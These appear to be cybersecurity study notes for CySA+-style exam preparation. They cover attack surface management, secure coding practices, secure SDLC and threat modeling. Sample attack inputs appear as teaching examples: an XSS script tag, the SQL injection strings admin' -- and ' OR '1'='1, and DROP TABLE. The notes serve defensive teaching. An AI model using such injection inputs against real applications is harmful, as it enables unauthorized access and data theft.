● Who performs it:
Security analysts or external ASM vendors
●
Expanded: Edge Discovery – How It’s Done
1. Passive DNS Lookups
● Definition:
Querying third-party DNS databases that have recorded past domain resolutions (DNS A/AAAA/CNAME
records) without directly querying your own servers.
● Goal:
To uncover all known hostnames, subdomains, and IP addresses associated with an organization —
including old systems, shadow IT, and external assets that may still be online but unmanaged.
Performed by:
○ Security analysts
External ASM providers
○ Threat hunters
● Why it matters:
Passive DNS can reveal forgotten domains like dev.example.com or oldportal.example.com that are no
longer linked from the main site but are still live and vulnerable.
2. IP Sweeps (Network Range Scanning)
● Definition:

197
Systematically scanning a known IP range (such as 203.0.113.0/24) to determine which IP addresses
respond to pings, TCP SYN probes, or other network activity.
Goal:
To map out every live IP address in a known external range and identify which ports or services they
expose.
● Performed by:
○ Internal security engineers
○ Red teams
Penetration testers
SOC analysts during exposure audits

● Tools Used:
Nmap, Masscan, Zmap
Why it matters:
IP sweeps often uncover unregistered services like exposed admin panels, forgotten VPN endpoints, or
unused services (like Telnet or FTP) that were never shut down.
● 3. TLS Certificate Monitoring
● Definition:
Observing newly issued or currently valid SSL/TLS certificates that reference your organization’s domain
names — including wildcard subdomains.
Goal:
To detect unauthorized certificates, track newly registered services, and monitor external services that
use your domain (or typo-squatted versions of it).
● Performed by:
○ Blue team defenders
Threat intelligence teams
○ External attack surface monitoring platforms (e.g., Censys, SecurityTrails, Shodan)
● Why it matters:
TLS certificates can expose internal systems unintentionally exposed (e.g., vpn.example.com) and help
correlate systems across cloud environments. Monitoring also helps detect domain spoofing or misissued
certs.
✅ Summary: What These Techniques Enable
All three of these help map your external-facing systems without directly probing them (in the case of passive
methods) or through active but targeted discovery (like IP sweeps). Their ultimate goal is to prevent attackers from
discovering an entry point before you do.

• Passive Discovery

● What it is:
Using existing logs, telemetry, and internet data to find assets without sending traffic
Sources:

198

DNS records, SSL certificates, Shodan, GitHub, VirusTotal
● Why it matters:
Finds forgotten systems or rogue assets (shadow IT)

• Security Controls Testing

● What it is:
Validating the effectiveness of controls (e.g., firewalls, EDR, DLP) in preventing access or abuse
● Examples:
Are default credentials blocked? Are known malicious payloads detected?
● Who performs it:
Blue team engineers or automated compliance tools

• Penetration Testing &amp; Adversary Emulation

● What it is:
Simulated real-world attacks to validate whether discovered assets are truly exploitable
● Includes:
Exploiting open ports, bypassing auth, chaining misconfigs
● Who performs it:
Red teams or contracted ethical hackers

• Bug Bounty

● What it is:
Open programs where vetted external researchers are rewarded for responsibly disclosing vulnerabilities
● Purpose:
Expands your security testing to a broader pool of skilled testers.

�� Attack Surface Reduction (ASR)
�� Definition

Once the attack surface is fully mapped, attack surface reduction means closing, hardening, or securing every
unnecessary pathway or asset that could be targeted by attackers.
✅ Common ASR Tactics

● Disable Unused Services
(e.g., remove Telnet, SMBv1, old dev environments)
● Enforce Strong Authentication
(e.g., MFA, password rotation, session timeout)
Restrict Access Based on Role &amp; Need
(e.g., RBAC, network segmentation)
● Patch and Harden Exposed Systems

199

(especially public-facing applications)
● Remove Default or Weak Credentials
(especially in routers, IoT, cloud consoles)

�� Summary Bullet Points

● Attack Surface Management (ASM)
○ Continuous discovery of all possible exposure points
○ Includes edge discovery, passive asset hunting, testing, and red teaming
○ Helps uncover forgotten, misconfigured, or high-risk systems
● Attack Surface Reduction (ASR)
○ Eliminates or hardens unnecessary entry points
Core defense tactic against exploitation
○ Involves patching, disabling services, enforcing authentication
○

�� Secure Coding Best Practices

Secure coding is the process of writing software in a way that proactively prevents vulnerabilities from being
introduced. These practices are not just about writing &quot;correct&quot; code — they’re about writing defensive code that
anticipates how systems can be abused.
Secure coding mitigates risks like injection, cross-site scripting (XSS), broken authentication, insecure
deserialization, and more.

What Is Insecure Deserialization?
Definition
Insecure deserialization is a vulnerability where an application accepts data from outside sources (like users or
APIs), trusts it too much, and rebuilds it into objects in memory — allowing attackers to sneak in code or change
behavior during that rebuilding process.

Let’s Define the Process First (Normal Behavior)

200

1. What is Serialization?
Serialization is like putting an object in a box so you can store it or send it somewhere — like across a network or
into a file.
It takes a live object (e.g., a user profile) and turns it into a data format like JSON, XML, or binary so it can be
transmitted or saved.
2. What is Deserialization?
Deserialization is the unpacking step. The application reads the box (serialized data) and rebuilds the original
object in memory, like reconstructing a user profile into code the system can use.

Normal Use Case Example:
● A server sends a user’s profile to a browser in JSON format.
● The browser stores this JSON in local storage.
● Later, the user sends that JSON back to the server.
● The server deserializes it to turn it back into a working object in memory (e.g., user.name, user.role).
So far, all good. That’s normal.
Where the Attack Comes In
Here’s the key insight:
The attacker is not added after the fact. They’re pretending to be a normal user from the start — but they’re
sending malicious data.
What Makes It &quot;Insecure&quot;?
● If the application blindly deserializes any input it receives without validating it...
● An attacker can modify the data before sending it, embedding malicious commands, changing object
structure, or tampering with values like roles or file paths.
Attack Flow: Step-by-Step
1. The application accepts serialized input (e.g., JSON, XML) from a user — maybe from a cookie or hidden
form field.
2. The attacker downloads this data and modifies it (adds a payload or changes fields).
3. The attacker sends it back to the server.
4. The application automatically deserializes it without validating its contents.
5. Malicious code executes during deserialization or the attacker alters program logic (e.g., changes role
from &quot;user&quot; to &quot;admin&quot;).
6. The attacker now has unintended access, system-level code execution, or other capabilities.
Real-World Analogy (Healthcare Example)

201
Imagine a hospital staff member downloads a patient summary form that the system generated. They open it,
modify the contents (without changing the formatting), and upload it back to the system.
If the hospital system trusts the format completely and automatically reloads the data into its database, the staff
member could sneak in false values (like fake insurance status or diagnosis codes) or malicious code that triggers on
import.
The problem?
The system trusted the data too much during deserialization.
Why It’s Dangerous
● It can allow Remote Code Execution (RCE) — literally letting an attacker run commands on the server.
● It’s difficult to detect because the attack happens during normal-looking data exchanges.
● It can escalate privileges, hijack sessions, or crash systems silently.
Mitigation Strategies
1. Never deserialize user-controllable data unless absolutely necessary.
Use formats like JSON or XML that don’t inherently reconstruct behavior or object logic.
Validate all input, even if it looks like structured data.
Digitally sign serialized data so attackers can’t tamper with it without detection.
2. Use serialization libraries that let you restrict which types of objects can be deserialized.
One-Sentence Summary
Insecure deserialization occurs when an application rebuilds untrusted data into objects without checking it first,
allowing attackers to inject code, change roles, or control execution.
✅ 1. Input Validation
● Definition:
Ensuring that any data received from the user (or any external system) is of the expected type, format, and
length.
● Purpose:
Prevent attackers from injecting malicious code, overflows, or invalid data into the application.
● Example:
If expecting an age input, only allow numeric values between 0–120. Reject inputs like DROP TABLE or
&lt;script&gt;.
● Who performs it:
Software developers (server-side and client-side)
Sanitization vs. Output Encoding (Executive-Level
Explanation)
Context: Who Is Who

202

● User: A person entering data into a website or application — such as typing into a form field.
● Application: The web service or backend that processes user input and sends content to the user’s
browser.
● Web Browser: The program (e.g., Chrome, Firefox) the user uses to view web pages and receive
responses from the application.
● Attacker: A malicious user trying to inject code or manipulate behavior (e.g., with &lt;script&gt; tags).

Why This Matters

When you build or defend a web application, you must assume that any user input could be malicious. For
example, an attacker could try to submit code that:
● Steals other users’ session cookies
● Defaces your website
● Forces the browser to execute unauthorized commands

To prevent this, two protective techniques are used:
1. Sanitization (first line of defense)
2. Output Encoding (last line of defense)
Definition and Roles
1. Sanitization

What it is:
Sanitization is the process of cleaning or stripping harmful content from user-supplied input as it enters the
application.
Performed by:
Web developers or application input-handling libraries.
When it happens:
Immediately after the user submits data, such as:
● Typing into a search box
● Submitting a comment
● Uploading a form
How it works:
● Removes or neutralizes &lt;script&gt;, onload=, or JavaScript expressions.
● Can block specific keywords or patterns entirely.

Example:
● A user enters: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
Sanitized version: (depending on config) either removed completely or rendered harmless

203

Purpose:
To stop known bad content from entering the system at all.

2. Output Encoding

What it is:
Output encoding is the process of transforming data right before it is displayed in the browser, so that any
dangerous characters are shown as plain text rather than executed as code. Output encoding happens when the
server prepares data to send back to the user’s browser, and it’s the last line of defense to make sure that even if
malicious content made it through input, it won’t be interpreted as executable code when rendered by the browser.
Performed by:
Web developers, template engines, or web frameworks during response generation.
When it happens:
When the application sends any user data back to the browser — such as:
● Displaying a username
Showing a user’s comment
● Filling a web form field
How it works:
● Converts &lt; into &amp;lt;, &gt; into &amp;gt;, &quot; into &amp;quot;, etc.
● Prevents the browser from interpreting the data as executable HTML or JavaScript

Example:
● Unsanitized user data: &lt;script&gt;alert(&quot;Hacked!&quot;)&lt;/script&gt;
● Encoded version: &amp;lt;script&amp;gt;alert(&quot;Hacked!&quot;)&amp;lt;/script&amp;gt;
● In the browser, this will show the code on the screen — not run it.
Purpose:
To render potentially dangerous input harmless even if it made it into the system.

Summary Analogy

Think of sanitization as checking someone’s luggage before they enter an airplane. If you see a weapon, you
confiscate it.
Think of output encoding as wrapping every item in tamper-proof packaging before placing it in the cabin —
even if something was missed during inspection, it can’t hurt anyone now.

204

Combined Use

Best Practice:
● Sanitize all user input when it enters the system.
● Encode all dynamic content before displaying it to users.

Why both?
Because sanitization might miss something, and output encoding ensures that even if bad data slips through, it
can’t do harm in the browser.

Secure Coding Best Practice: Session Management
Definition
Session management refers to the process of securely maintaining a user&#39;s identity and authenticated state
across multiple interactions with a web application after they log in. Because HTTP is stateless by design (it
doesn’t remember users between requests), applications use session mechanisms (like cookies or tokens) to track
users across multiple pages or requests.
Purpose
The goal of secure session management is to prevent attackers from hijacking, impersonating, or misusing valid user
sessions. Proper session control helps ensure that only the rightful user can continue their interaction with the system
and that sessions cannot be reused or tampered with.
Common Session-Based Attacks (with Definitions)
● Session Hijacking:
An attacker steals a valid session ID (e.g., from an exposed cookie or via network sniffing) and uses it to
impersonate a user without needing to log in.
● Session Fixation:
The attacker sets or predicts a session ID (e.g., through a crafted link) and tricks the victim into logging in
using that ID. The attacker then reuses the same session to gain access after authentication.
● Session Reuse (aka Session Replay):
An attacker captures a previously valid session token (e.g., through phishing or cache theft) and reuses it
after logout or expiration if the system doesn&#39;t properly invalidate it.

Best Practices for Session Management
1. Regenerate Session ID After Login
○ Why: Prevents session fixation attacks.

205
○ How: When a user logs in, the server should discard any pre-login session ID and generate a fresh
one for the authenticated session.
2. Use Timeouts and Inactivity Expiration
○ Why: Limits the window of opportunity for an attacker.
How: Automatically expire sessions after a fixed duration (e.g., 15–30 minutes of inactivity) or total
lifespan (e.g., 24 hours).
3. Store Cookies with HttpOnly Flag
○ Why: Prevents JavaScript-based access to cookies, mitigating cross-site scripting (XSS) risks.
○ How: Mark cookies as HttpOnly, so they can&#39;t be read or written by client-side scripts.
4. Use the Secure Flag
○ Why: Ensures cookies are only transmitted over HTTPS, not unencrypted HTTP.
○ How: Mark cookies with the Secure flag to protect against network sniffing.
5. Restrict Session Scope (Path, Domain)
○ Why: Minimizes exposure to unrelated parts of the site or third-party scripts.
○ How: Define which parts of the site the session cookie applies to using the Path and Domain
attributes.

6. Invalidate Sessions on Logout or Credential Change
○ Why: Prevents reuse of old tokens.
○ How: Actively destroy the session server-side on logout or after password changes.
Who Performs This
Secure session management is implemented by web application developers and back-end engineers, often in
consultation with security architects or DevSecOps engineers. Security analysts and testers verify correct
implementation during code reviews, penetration testing, or security audits.

Secure Coding Best Practice: Authentication

Definition
Authentication is the process of verifying that a user, system, or entity is who they claim to be before
granting access to protected resources.
● In web applications, this usually means confirming a user’s identity via a username and password, a
hardware token, or a biometric input.

206

● Authentication answers the question: “Who are you?”
(This is distinct from authorization, which answers: “What are you allowed to do?”)

Why It Matters
Flawed authentication opens the door to:
● Account hijacking
● Privilege escalation
● Data exposure
Total compromise of sensitive systems
It&#39;s consistently ranked among the most dangerous vulnerabilities in OWASP Top 10.

Roles and Context
● User: Someone attempting to log in or prove their identity.
● Application Server: The system that processes login attempts and issues session tokens.
● Developer: The one who designs how the system handles logins and credential storage.
Attacker: Tries to bypass authentication or impersonate legitimate users.
Normal Behavior vs. Attacker Abuse (in Bullet Points)
● User login
○ Normal: User enters correct credentials and receives a session token.
○ Attacker: Uses brute-force or leaked credentials to log in as the user.
● Credential storage
Normal: Passwords are hashed with secure algorithms like bcrypt and never stored in plaintext.
○ Attacker: Looks for weak or plaintext password storage to extract passwords directly.
● Session handling
Normal: Server generates a new session token after login and expires the old one.
○ Attacker: Attempts session fixation by pre-setting the session token before login.
● Login attempt monitoring
○ Normal: Repeated failed logins are blocked or slowed with rate-limiting or CAPTCHA.
○ Attacker: Sends automated requests rapidly to guess credentials if no rate-limiting exists.
○ Who Implements Authentication
● Web Developers: Implement login forms, validation logic, session handling.
DevOps / Cloud Engineers: Configure MFA systems, token validation, identity providers.
● Security Analysts: Monitor logs, detect login abuse, and assess weaknesses.
● Security Architects: Design secure authentication flows and enforce organizational policies.

207

Secure Authentication Practices
1. Strong Password Requirements
○ Minimum length, complexity, password deny lists.
○ Encourage password manager usage.
2. Multi-Factor Authentication (MFA)
○ Require two of: password, device, or biometric.
○ Common combinations: password + SMS code, password + authenticator app.
3. Avoid Hard-Coded Credentials
○ Never store credentials in source code or config files.
○ Use a secure secrets manager (e.g., HashiCorp Vault, AWS Secrets Manager).
4. Secure Password Storage
○ Always hash passwords with strong algorithms:
■ bcrypt, scrypt, or Argon2
Never use fast or broken ones like MD5 or SHA-1

○ Add salt to each password before hashing.
5. Rate Limiting
○ Throttle login attempts per IP or account.
○ Use exponential backoff or lockout after a certain number of failed attempts.
6. CAPTCHA Implementation
○ Prevent automated login attempts or credential stuffing bots.
7. Credential Stuffing Detection
○ Monitor patterns of failed logins across different accounts.
○ Use breach data monitoring and threat intel feeds.
8. Use Identity Libraries or Federated Authentication
○ Use standardized, secure libraries like OAuth2, OpenID Connect, or SAML instead of
custom-built login logic.
○ Common Authentication Errors
● Allowing default passwords (e.g., admin/admin)
● Storing credentials in plain text
● Using outdated hash algorithms (e.g., MD5)
● Allowing unlimited login attempts
● Weak password reset mechanisms (e.g., no token expiration)
●
● Why Token Expiration Is Critical in Password Reset Mechanisms
● When a user requests a password reset, the application sends them a unique reset link, which
includes a one-time token. This token is designed to temporarily confirm that the user is authorized
to reset their password. If the application does not enforce a short expiration time for that token —
typically 15 to 60 minutes — it creates a significant security risk. An attacker who gains access to
that token (through email compromise, phishing, or intercepted messages) could reset the password
hours or even days later, long after the user has forgotten about the request. Additionally, if the
system allows the same token to be reused multiple times, attackers can exploit that behavior to
hijack accounts without the victim realizing it. A secure password reset system must expire tokens
quickly and invalidate them after a single use. These mechanisms are crucial to preventing account

208
takeover during recovery flows and are a common point of failure in insecure authentication
systems.
●

Key Related Terms
● Session Hijacking: Attacker steals a valid session token and uses it to impersonate a user.
● Session Fixation: Attacker sets a session token before login and tricks the user into using it.
● Token-Based Authentication: Uses tokens (like JWTs) instead of session IDs to prove identity.
● Single Sign-On (SSO): Allows a user to log in once and gain access to multiple systems.

Summary Analogy
Think of authentication like securing the front door to a building:
● Passwords are the key
● MFA is the key plus a fingerprint scan
A hashed password is like a key that can’t be duplicated even if stolen
● Rate limiting is the guard who stops someone trying every key
● Federated identity (SSO) is a secure building pass that works in multiple offices
​​

Data Protection

Definition
Data protection refers to the set of strategies and controls used to safeguard sensitive information from
unauthorized access, modification, or loss — both in transit (as it moves across networks) and at rest (while stored
on devices, servers, or backups). This includes encryption, access controls, secure handling of secrets, and proper
key management.
Purpose
The goal of data protection is to ensure confidentiality, integrity, and availability (CIA) of sensitive data, whether
it&#39;s customer records, authentication credentials, intellectual property, or security logs. Strong data protection
is also essential for regulatory compliance (e.g., HIPAA, PCI-DSS, GDPR) and preserving organizational trust.

Normal System Behavior vs. Attacker Abuse
● Normal Behavior:
○ Data in transit (e.g. login credentials, form data, file uploads) is encrypted via HTTPS/TLS to
prevent interception or tampering.

209
Data at rest (e.g. databases, log files, backups) is encrypted using strong, modern ciphers like
AES-256.
○ Secrets such as API keys, passwords, and certificates are stored securely, not in plain text or
source code.
○ Access to sensitive data is role-restricted, logged, and reviewed.
Keys are managed using a key management system (KMS) or hardware security module (HSM),
with proper rotation and storage controls.

● Attacker Abuse:
○ Man-in-the-middle (MITM) attacks intercept unencrypted data in transit.
Stolen or leaked unencrypted backups expose vast amounts of data.
○ Attackers scan code repositories for hardcoded credentials.
○ Poor or absent key management leads to compromised encryption keys.
Excessive privileges or misconfigured storage allow unauthorized access to sensitive data.
○ Key Practices for Strong Data Protection
1. Encrypt Data in Transit
Use HTTPS with TLS 1.2 or higher for all external and internal communication.
○ Validate TLS certificates (no self-signed certs in production).
○ Disable insecure protocols (e.g., SSLv3, TLS 1.0) and enforce HSTS.
2. Encrypt Data at Rest
○ Use disk-level or database-level encryption.
○ Encrypt sensitive columns (e.g., Social Security numbers, credit card data) individually when
needed.
○ Encrypt all backups and cloud storage containers (e.g., AWS S3 with server-side encryption).
3. Secure Secrets
○ Never hard-code API keys, credentials, or encryption keys into source code.
○ Use a secrets manager (e.g., AWS Secrets Manager, HashiCorp Vault).
○ Rotate secrets regularly and revoke unused credentials.
4. Implement Access Controls
○ Apply principle of least privilege (PoLP) to data access.
○ Use role-based access control (RBAC) or attribute-based access control (ABAC).
○ Log and monitor all access to sensitive data.
5. Use Proper Key Management
○ Protect encryption keys using a centralized Key Management System (KMS) or HSM.
○ Enforce key rotation policies and audit key usage.
○ Never store keys alongside the data they protect.

Real-World Example

A cloud-hosted e-commerce platform stores customer payment data. All payment information is encrypted using
AES-256, and the encryption keys are stored in AWS KMS with strict IAM controls. All client-server communication is
forced over HTTPS, and the application refuses non-TLS connections. Secrets used for third-party payment

210
processors are stored in a dedicated secrets manager, not in the application code. If an attacker gains access to the
database, the encrypted data is useless without the keys. And even if an insider tries to extract data, audit logs
capture every access to the encrypted records.

Who Implements These Controls?
● Application Developers: Implement encryption logic, avoid hard-coded secrets, and use secure libraries.
● DevOps Engineers: Configure secrets managers, enforce TLS across services, and set up encrypted cloud
storage.
Cloud Engineers / System Administrators: Manage key rotation policies, enforce disk encryption, and
restrict storage access.
● Security Analysts: Audit data access, validate encryption effectiveness, and detect suspicious access
patterns in logs.
Key Takeaway

Data protection is not a single control — it&#39;s a layered discipline combining encryption, secure storage, restricted
access, and monitoring. When properly implemented, even if an attacker breaches a system, they cannot make
meaningful use of the data they obtain. Defense-in-depth is essential: if one layer fails, others must still protect
the data.

Parameterized Queries
Definition
Parameterized queries (also called prepared statements) are a coding technique used in database interactions
where data and commands are kept strictly separate. Rather than building an SQL query by concatenating
strings (e.g. &quot;SELECT * FROM users WHERE username = &#39;&quot; + userInput + &quot;&#39;;&quot;), the query is pre-written with
placeholders (e.g. ? or :username), and user input is bound to those placeholders at execution time.
Purpose
The main purpose of parameterized queries is to prevent SQL injection attacks by ensuring that user input is
always treated as data, not as part of the SQL command. This breaks the attacker’s ability to inject malicious SQL
code.
Normal System Behavior vs. Attacker Abuse
● Normal Behavior with Parameterized Queries:
The developer writes the SQL command ahead of time with placeholders.
○ The database engine is told, “Here’s the structure of the query,” and later, “Here’s the data to plug
into it.”
○ The input is automatically escaped and validated by the database driver or ORM.
○ Even if the user types something like admin&#39; OR &#39;1&#39;=&#39;1, it is treated as a string — not as SQL.
● Vulnerable Behavior Without Parameterization:

211

○ The application builds SQL by directly inserting user input into the query string.
An attacker can inject raw SQL that modifies the behavior of the query (e.g., bypass login, extract
data, or drop tables).
○ The application cannot distinguish between data and commands.

How It Works:
Example – Without Parameterization (Vulnerable):
● query = &quot;SELECT * FROM users WHERE username = &#39;&quot; + userInput + &quot;&#39;;&quot;
If userInput = admin&#39; --, the query becomes:
● SELECT * FROM users WHERE username = &#39;admin&#39; --&#39;;

The -- comments out the rest of the SQL statement, effectively bypassing authentication.
Example – With Parameterized Query (Safe):
● query = &quot;SELECT * FROM users WHERE username = ?&quot;
● cursor.execute(query, (userInput,))
● Here, even if userInput = admin&#39; --, it is passed as a literal string, not executed as part of the SQL command.
Why This Matters in Real Life
● SQL injection remains one of the most exploited vulnerabilities, according to OWASP and many
industry breach reports.
● Attackers can use injection flaws to access unauthorized data, modify database contents, or even
execute system commands depending on the privileges of the database user.
Even sophisticated applications have fallen victim when developers forget to parameterize just one query.
Who Uses Parameterized Queries
● Back-End Developers: Must write all database-interacting code using parameterized queries or frameworks
that do so by default.
Security Engineers: May audit source code or dynamic app behavior to ensure parameterization is
enforced.
● Code Reviewers and DevSecOps: Perform security reviews, scanning, or pen testing to detect
unparameterized query risks.

Best Practices
1. Always Use Parameterized Queries or Prepared Statements
○ Supported in nearly every major language and database.

212

Do not manually escape input — use the DB driver’s parameterization.

2. Avoid String Concatenation for Queries
○ Even if input is validated, concatenating input into queries creates risk.
3. Use ORM Frameworks That Default to Safe Queries
○ Tools like SQLAlchemy (Python), Entity Framework (.NET), or Hibernate (Java) encourage safe
practices by design.
4. Automate Checks
○ Static analysis tools can flag unsafe SQL construction.
○ Require secure code review before deployment.

Analogy
Think of a parameterized query like ordering food at a restaurant with a pre-printed menu.
You say “I’d like a #2 with no onions,” and the waiter writes it into fixed fields on a kitchen form.
You’re not allowed to rewrite the recipe.
But if the chef just lets you handwrite your own recipe card — even if you say “#2; add arsenic” — and then follows it
without question, that’s string concatenation.
Key Takeaway
Parameterized queries enforce a separation of code and data, which is one of the most foundational protections
in secure coding. Without this separation, every user input becomes a potential threat vector. With parameterization,
even malicious input remains harmless, because it&#39;s never treated as executable logic.
Secure Coding Summary (Expanded)

1. Input Validation
○ Validate all user input before it enters your system.
○ Accept only expected formats (e.g. numbers in age fields, no scripts in names).
○ Use allowlists (what is allowed), not blocklists (what is forbidden).
Helps prevent injection attacks, buffer overflows, and malformed data handling.

2. Output Encoding
○ Transform potentially dangerous data before displaying it in the browser.
○ Ensures special characters like &lt;, &gt;, or &#39; are shown as text, not interpreted as code.
○ Stops untrusted input from becoming a script (used against the user in cross-site scripting).
○ Final defense after input validation.
3. Session Management
○ Controls how a user remains logged in across requests.
Uses secure, time-limited, unpredictable session IDs.
Regenerate session tokens after login or privilege changes.

213
○ Set cookies with HttpOnly and Secure flags to prevent theft via JavaScript or unencrypted
transmission.
4. Authentication
○ Verifies user identity using secure login mechanisms.
○ Enforce strong passwords and use multi-factor authentication.
Lock out or rate-limit repeated failed logins to prevent brute force.
Never store passwords in plaintext — hash them using algorithms like bcrypt or Argon2.

5. Data Protection
○ Protect sensitive data both in transit and at rest.
Use TLS/HTTPS for communication.
○ Encrypt stored data, backups, and environment secrets.
○ Use secure key management and avoid hard-coding credentials in codebases.
6. Parameterized Queries
○ Always separate SQL logic from user input.
○ Never build SQL queries by concatenating strings with input data.
Use prepared statements or query placeholders (?, :param) to prevent SQL injection.
Built into most database libraries and ORMs across all major programming languages.
Key Takeaways

● These practices aren’t optional—they’re essential to prevent code from becoming a weapon.
● Each principle defends a different entry point into the system.
Secure coding protects against the top OWASP threats: injection, broken authentication, XSS, insecure
session handling, etc.
● Most secure coding failures do not require advanced hacking tools—they come from missing safeguards
during routine development.

Secure Software Development Lifecycle (SDLC)
Also referred to as the Cybersecurity Development Lifecycle (CDLC)
Definition
The Secure Software Development Lifecycle is a structured process that integrates security practices into each
phase of software development — from planning to retirement.
Its goal is to build security into the product, not bolt it on later.
Why It Matters (Normal Behavior vs. Risk)

214
In traditional development, security is an afterthought — tested only at the end, if at all. This leads to vulnerabilities
baked into the code.
In a secure SDLC, each stage proactively identifies and mitigates risks, reducing both cost and exposure.

Who’s Involved
● Developers: Implement secure coding standards and follow best practices during development.
● Security Engineers: Embed tools and techniques for code review, threat modeling, and vulnerability
scanning.
DevOps / DevSecOps: Automate security into build pipelines (CI/CD).
Product Owners / Business Analysts: Identify data sensitivity and risk early in the process.
Security Analysts (You): Review secure design, analyze logs for development-stage threats, validate post-
deployment controls.
Phases of a Secure SDLC (with Embedded Security Controls)
1. Planning
○ What happens: Define software goals, scope, user roles, and business requirements.
Security actions:
■ Perform risk assessments.
Identify regulatory or compliance obligations.
Define data sensitivity classifications (e.g., PII, PCI, PHI).

2. Design
○ What happens: High-level and detailed architecture decisions are made.
○ Security actions:
■ Conduct threat modeling (e.g., STRIDE).
■ Define trust boundaries (what can talk to what).
■ Review use of cryptography, authentication, and access control mechanisms.

3. Development
○ What happens: Code is written.
Security actions:
■ Apply secure coding standards (e.g., input validation, parameterized queries).
■ Use code analysis tools (SAST – Static Application Security Testing).
Avoid hard-coded secrets, insecure APIs.

4. Testing
○ What happens: Validate functionality and performance.
Security actions:
■ Conduct dynamic testing (DAST – Dynamic Application Security Testing).
Perform vulnerability scanning and penetration testing.
■ Test error handling, session behavior, access control enforcement.

5. Deployment
○ What happens: Application is released to production.
Security actions:
■ Ensure environment hardening (e.g., remove debug features).
Deploy using least privilege principles.

215

■ Verify certificate validity, HTTPS enforcement, and secure configurations.

6. Maintenance / Operations
○ What happens: Application is monitored, updated, and patched.
○ Security actions:
Regularly apply security patches and updates.
■ Monitor logs for anomalies (via SIEM).
Update software dependencies and validate third-party components.

7. End of Life
○ What happens: Application is retired or decommissioned.
○ Security actions:
Securely delete data, revoke certificates, disable accounts.
■ Ensure removal of public exposure (e.g., DNS entries, open ports).
■ Retain necessary audit trails for compliance.

Real-World Analogy
Think of software like building a hospital. You wouldn’t wait until the hospital is already built and full of patients before
you test the fire exits or add locks to medication rooms.
Security must be part of the blueprint, not just the inspection.
Security Tools Integrated in SDLC
● SAST: Analyzes source code for insecure patterns before running.
● DAST: Probes the running app for vulnerabilities.
● Software Composition Analysis (SCA): Checks for vulnerable third-party libraries.
Fuzzing: Sends random or malformed data to uncover crashes or exploits.
Key Takeaways
● Secure SDLC is not just a developer responsibility — it requires coordination between security,
operations, compliance, and business teams.
Shifting security “left” (into the early phases of development) reduces cost and risk.
● Each SDLC phase has specific security goals and common failure points.
● Tools like SAST, DAST, and SCA allow continuous, automated enforcement of security throughout
development.

Threat Modeling – Executive-Level Summary
(CySA+ Domain 2: Threats, Vulnerabilities, and Risk Management)

216

Definition
Threat modeling is the structured process of identifying, categorizing, and prioritizing potential threats to a
system — before attackers find them. It’s used to understand what could go wrong and design defenses proactively.
Think of it as building a map of your system’s weaknesses before the attacker does.
Why It Matters
You cannot defend what you don’t understand. Threat modeling reveals:
● Where systems are exposed
● Who might attack them
● What attack paths are most likely
● What controls would matter most
It supports risk-informed decision-making and shifts security left in the lifecycle (early in design and architecture).
Who Performs Threat Modeling?
● Security Analysts (You): Assist in identifying threats, mapping attack surfaces, and validating controls.
Application Security Engineers: Build models during development.
● System Architects / Network Designers: Integrate modeling into infrastructure planning.
● DevOps &amp; Product Teams: Use threat models to understand risk and prioritize fixes.
When It Happens
Threat modeling can occur:
● During design of a new system or app
● When changes are introduced (e.g., new features, cloud migration)
● As part of periodic reviews or security assessments
Core Components of Threat Modeling
1. Asset Identification
○ What are we protecting?
○ Examples: user credentials, payment info, cloud databases, encryption keys
2. Attack Surface Mapping
○ Where can an attacker interact with the system?
Examples: login forms, APIs, file uploads, exposed ports, third-party services

3. Threat Enumeration
What can go wrong?
○ Use structured models like STRIDE:

217

■ Spoofing identity
■ Tampering with data
Repudiation (denying actions)
■ Information disclosure
■ Denial of service
■ Elevation of privilege

4. Threat Actor Profiling
○ Who might attack us?
○ External hackers, insiders, script kiddies, APTs, or competitors
5. Control Gap Identification
Where are we missing protections?
○ Are we encrypting sensitive data?
○ Are access controls granular enough?
6. Risk Prioritization
○ Which threats are most dangerous based on:
■ Impact (damage if exploited)
■ Likelihood (ease or probability of exploit)

7. Mitigation Planning
○ Design specific defenses based on the identified threats
Use compensating controls where necessary

Example Threat Modeling Scenario: Cloud Storage Service
Component Example

Asset Customer files stored in S3 buckets

Attack Surface Web upload portal, REST API, authentication system

Threat (STRIDE) Information Disclosure: misconfigured bucket permissions

Threat Actor External attacker using automated scans

Control Gap Buckets lack ACL enforcement or logging

218

Mitigation Enforce least privilege, monitor access logs, use encryption at rest





Analogy for Threat Modeling
Think like a burglar planning a heist.
Before robbing a house, they ask:
● What valuables are inside? (assets)
● How can I get in? (attack surface)
What kind of alarms or locks are there? (controls)
What’s the easiest path with the lowest risk of getting caught? (prioritization)
As defenders, threat modeling means beating the burglar to the punch.

Key Takeaways
● Threat modeling is strategic thinking for defenders.
● It turns assumptions into actionable security plans.
● Using structured models like STRIDE ensures you don’t miss common threat types.
● Models evolve as systems change — threat modeling is a living process, not a one-time task.

■# Final note added for formatting test
12345
